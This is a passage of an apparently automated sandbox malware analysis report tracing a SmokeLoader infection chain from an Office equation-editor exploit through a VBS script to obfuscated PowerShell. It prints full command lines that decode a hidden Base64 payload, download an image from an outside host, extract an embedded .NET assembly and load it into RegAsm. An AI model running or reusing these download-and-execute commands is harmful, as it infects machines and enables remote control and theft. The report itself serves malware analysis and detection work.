                                  2024-05-27 16:35:36 UTC1369INData Raw: 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c
                                  Data Ascii: :T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
                                  2024-05-27 16:35:36 UTC1369INData Raw: 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53
                                  Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rS
                                  2024-05-27 16:35:36 UTC1369INData Raw: 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16
                                  Data Ascii: W_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
                                  2024-05-27 16:35:36 UTC1369INData Raw: ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e
                                  Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:12:34:49
                                  Start date:27/05/2024
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                  Imagebase:0x13f630000
                                  File size:28'253'536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:4
                                  Start time:12:35:10
                                  Start date:27/05/2024
                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                  Imagebase:0x13fba0000
                                  File size:1'423'704 bytes
                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:8
                                  Start time:12:35:22
                                  Start date:27/05/2024
                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                  Imagebase:0x400000
                                  File size:543'304 bytes
                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:12:35:24
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"
                                  Imagebase:0xc10000
                                  File size:141'824 bytes
                                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:12:35:27
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRwBCDgTreFIDgTreLwDgTrewDgTreDgDgTreMDgTreDgTre4DgTreC8DgTreNgDgTre1DgTreDEDgTreLgDgTre3DgTreDcDgTreMQDgTreuDgTreDYDgTreNDgTreDgTreuDgTreDgDgTreOQDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                  Imagebase:0xc10000
                                  File size:427'008 bytes
                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:12
                                  Start time:12:35:29
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
                                  Imagebase:0xc10000
                                  File size:427'008 bytes
                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:13
                                  Start time:12:35:43
                                  Start date:27/05/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0x1180000
                                  File size:64'704 bytes
                                  MD5 hash:8FE9545E9F72E460723F484C304314AD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:14
                                  Start time:12:35:48
                                  Start date:27/05/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0xff2f0000
                                  File size:3'229'696 bytes
                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:15
                                  Start time:12:36:07
                                  Start date:27/05/2024
                                  Path:C:\Windows\System32\taskeng.exe
                                  Wow64 process (32bit):false
                                  Commandline:taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                  Imagebase:0xff6a0000
                                  File size:464'384 bytes
                                  MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:16
                                  Start time:12:36:07
                                  Start date:27/05/2024
                                  Path:C:\Users\user\AppData\Roaming\rugtucw
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\rugtucw
                                  Imagebase:0xf90000
                                  File size:64'704 bytes
                                  MD5 hash:8FE9545E9F72E460723F484C304314AD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  • Detection: 0%, Virustotal, Browse
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:18
                                  Start time:12:36:08
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                  Imagebase:0x920000
                                  File size:2'972'672 bytes
                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:19
                                  Start time:12:36:09
                                  Start date:27/05/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\explorer.exe
                                  Imagebase:0xff2f0000
                                  File size:3'229'696 bytes
                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:21
                                  Start time:12:36:10
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
